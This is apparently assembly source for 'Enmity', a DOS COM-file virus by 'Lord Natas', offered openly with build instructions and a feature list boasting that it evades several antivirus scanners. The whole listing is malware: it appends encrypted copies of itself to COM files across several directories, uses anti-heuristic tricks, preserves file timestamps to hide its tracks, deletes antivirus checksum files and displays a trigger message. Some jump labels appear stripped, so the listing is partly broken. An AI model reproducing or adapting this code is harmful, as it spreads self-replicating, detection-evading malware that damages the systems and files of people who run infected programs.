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comment #
Enmity, by Lord Natas
*COM infection (appending, nonresident)
*antiheuristic code
*no TBSCAN flags at time of release (second generation)
*encryption (xor, random 16 bit key)
*works with microsoft COM files (the ones with the stupid checksum)
*infects all files in current directory, then in the upper directory,
then in \, then in C:\WINDOWS\COMMAND.
*preserves date, time, attributes
*doesn't infect command.com, tb*.com files, or misnamed EXE files
*removes scanner checksums
Scanning results:
FPROT(3): nothing
AVP: nothing
TBSCAN(WIN95): nothing
FINDVIRUS: nothing
DRWEB: nothing
Assemble with TASM.
MASM produces errors (at least, the version I have)
.model tiny
org 100h
code_length equ end_virus-start
;----- fake host - a jump and infection mark
db 0e9h,0,0,'66'
call get_offset
;----- get the delta offset
pop ax ;nice and (somewhat) anti-heuristic
xchg cx,ax
sub cx,offset get_offset
xchg bp,cx
call decrypt
jmp short virus_start
mov ax,4c00h ;this shuts-up findvirus
int 21h
push 1a01h ;!heuristic killer!
push 100h
lea si,[bp+oldbytes]
pop di
movsw ;move 5 bytes to 0100h
;----- move the DTA to the end
lea dx,[bp+dta] ;store in dta
pop ax
dec ax ;!heuristic killer!
int 21h
;----- save our current directory
mov ah,47h
xor dl,dl
lea si,[bp+old_dir] ;store in old_dir
int 21h
;----- find *.COM files
call killer
call findfirst
int 21h
jc try_updir ;if error jump
call infect ;else infect
mov ah,4fh ;find next file
jmp short find_file
mov ah,3bh
lea dx,[bp+higher_dir] ;change dir up
int 21h
jc is_root
call killer
call findfirst
int 21h
jc is_root ;if none, exit
call infect ;else infect
mov ah,4fh ;find next
jmp short find_updir
mov ah,47h
xor dl,dl
lea si,[bp+dir_chk] ;store in dir_chk
int 21h
cmp byte ptr [bp+dir_chk],0
je try_win
mov ah,3bh
lea dx,[bp+root] ;change dir to root ('\')
int 21h
jc try_win
call killer
call findfirst
int 21h
jc try_win ;if none, exit
call infect ;else infect
mov ah,4fh ;find next
jmp short find_root
mov ah,3bh
lea dx,[bp+win_command] ;change dir to command
int 21h
jc done_files
call killer
call findfirst
int 21h
jc done_files ;if none, exit
call infect ;else infect
mov ah,4fh ;find next
jmp short find_win
mov ah,3bh ;change back to old_dir
lea dx,[bp+old_dir]
int 21h
mov ah,2ch ;get time
int 21h
cmp dx,5 ;is it time to activate?
ja fix_dta ;no? return to host
mov ax,13 ;put video in mode 13
int 10h
lea si,[bp+msg]
cld ;clear direction flag (left
lodsb ;to right)
or al,al ;check for text end
jz fix_1
mov ah,0eh ;write char
xor bh,bh ;page 0
mov bl,5 ;color 5 -> magenta
int 10h
jmp short print_lp
xor ax,ax ;wait for key
int 16h
mov ax,03h ;restore to textmode
int 10h
;----- reset DTA
push 1a00h ;fix dta
mov dx,80h
pop ax
int 21h
;----- clean up
xor ax,ax
mov bx,ax
mov cx,ax
mov dx,ax
mov di,ax
mov bp,ax
mov si,0101h ;special gift for TBAV
;----- restore control to cs:0100h
dec si
push si ;put 100h on stack so virus
ret ;jumps to host
;----- check name
cmp word ptr [bp+dta+1eh+5], "DN" ;commaND
je return
cmp word ptr [bp+dta+1eh], "BT" ;TBdel
je return
mov cx,13d ;max file length
lea si,[bp+dta+1eh] ;filename in dta
lodsb ;get byte
cmp al,"." ;is it "."?
jne compare ;no, compare
cmp byte ptr [si],"C" ;is is *.C?
jne return ;no, return
;----- save attributes,time,date,size
mov cx,5 ;5 bytes
lea si,[bp+dta+15h] ;point to the dta
lea di,[bp+f_attr] ;move to f_attr
rep movsb
;----- remove attributes
mov ax,4301h
xor cx,cx ;no attribute
lea dx,[bp+dta+1eh] ;point to name in dta
int 21h
;----- open file for read/write
push 3d04h ;!heuristic killer!
lea dx,[bp+dta+1eh] ;filename in dta
pop cx
sub cx,2
xchg ax,cx
int 21h
xchg bx,ax ;put handle in bx
push 3f00h ;!heuristic killer!
;----- read 1st five bytes
mov cx,5
lea dx,[bp+oldbytes] ;store in oldbytes
pop ax
int 21h
;----- check for misnamed .EXE (fuck you microsoft) - anti-heuristic
mov ax,word ptr [bp+oldbytes]
add ax,0101h
cmp word ptr ax,'[N' ;check first 2 bytes
je close_file
cmp word ptr ax,'N['
je close_file
;----- check for infection mark
cmp word ptr [bp+oldbytes+3],'66' ;look for 66
je close_file
;----- check size - if > 60000 then close
cmp word ptr [bp+dta+1ah], 60000
ja close_file
;----- seek to eof - 7
mov ax,4202h
mov cx,-1
mov dx,-7
int 21h
;----- (eof-7)+7=eof
mov cx,7
add ax,cx
;----- calculate jump
sub ax,3
mov word ptr [bp+jump_bytes+1],ax
;----- read 7 bytes
mov ah,3fh
mov cx,7
lea dx,[bp+buffer]
int 21h
;----- add virus size to checksum
add word ptr [bp+buffer+5],code_length
;----- make new key
push 4000h
mov ah,2ch ;get time
int 21h
mov word ptr [bp+key1],dx ;use seconds + hundreths
;----- write unencrypted portion
mov cx,virus_start-start
lea dx,[bp+start]
pop ax
int 21h
;----- encrypt & move
push 4001h
mov cx,(key1-virus_start+1)/2 ;length of code
mov dx,word ptr [bp+key1] ;key
lea si,[bp+virus_start] ;source: virus start
lea di,[bp+crypt_buffr] ;destination: buffer
lodsw ;get byte from source
xor ax,dx ;xor it
stosw ;move it to destination
loop xor_loop2
;----- write encrypted shit
mov cx,key1-virus_start
lea dx,[bp+crypt_buffr]
pop ax ;!heuristic killer!
dec ax
push 4000h
int 21h
;----- write more unencrypted shit
mov cx,f_attr-key1 ;this is the decryptor and
lea dx,[bp+key1] ;other stuff that remains
pop ax ;unencrypted
int 21h
;----- seek to start of file
mov ax,4200h
xor cx,cx
push 4000h
int 21h
;----- write the jump
mov cx,5
lea dx,[bp+jump_bytes]
pop ax ;!heuristic killer!
int 21h
;----- restore date/time
push 5701h
mov cx,word ptr [bp+f_time]
mov dx,word ptr [bp+f_date]
pop ax ;!heuristic killer!
int 21h
;----- close file
mov ah,3eh
int 21h
;----- restore attributes
mov ax,4302h
xor ch,ch
mov cl,byte ptr [bp+f_attr] ;old attributes
lea dx,[bp+dta+1eh] ;filename in dta
int 21h
;----- checksum deletion
lea dx,[bp+tbsum] ;pont to name
call kill_bad_file ;kill it
lea dx,[bp+pcsum1]
call kill_bad_file
lea dx,[bp+pcsum2]
call kill_bad_file
lea dx,[bp+ivsum]
call kill_bad_file
;----- delete bad files - input: DS:DX = to kill
mov ax,4301h
xor cx,cx ;no attribute
int 21h
mov ah,41h ;delete
int 21h
clc ;clear carry
mov ah,4eh
mov cx,0007h ;all attributes
lea dx,[bp+comspec] ;comspec = filemask
;----- data area 1
msg db 'Enmity',13,10,0
db 'by Lord Natas',0
comspec db '*.*OM',0 ;file search mask
win_command db 'C:\WINDOWS\COMMAND',0 ;target directory
root db '\',0 ;another target
higher_dir db '..',0 ;yet another
tbsum db 'ANTI-VIR.DAT',0 ;checksums to delete
pcsum1 db 'CHKLIST.MS',0
pcsum2 db 'CHKLIST.CPS',0
ivsum db 'IVB.NTZ',0
oldbytes db 90h,90h,90h,0cdh,20h ;host bytes
jump_bytes db 0e9h,0,0,'66' ;the jump to write
key1 dw ? ;encryption key
;----- simple xor encryption, TBAV screwing loop
mov cx,(key1-virus_start+1)/2 ;code length
mov dx,word ptr [bp+key1] ;key
lea si,[bp+virus_start] ;source of code
mov di,si ;to decrypt
jmp short fake2
jmp short fake3
xor ax,dx
jmp short fake1
loop xor_loop
;----- data area 2 - stuff for microsoft's lame checksums
buffer db 5 dup (?) ;buffer = eof-2
size_checksum db 2 dup (90h) ;checksum for microsoft coms
;----- this is not written to disk, thus saving much space
f_attr db ? ;file attribute
f_time dw ? ;file time
f_date dw ? ;file date
old_dir db 64 dup (?) ;old directory name
dta db 48 dup (?) ;DTA storage
dir_chk db 64 dup (?) ;for dir checking
;----- temp buffer for encryption
crypt_buffr db end_virus - virus_start dup (?)
end host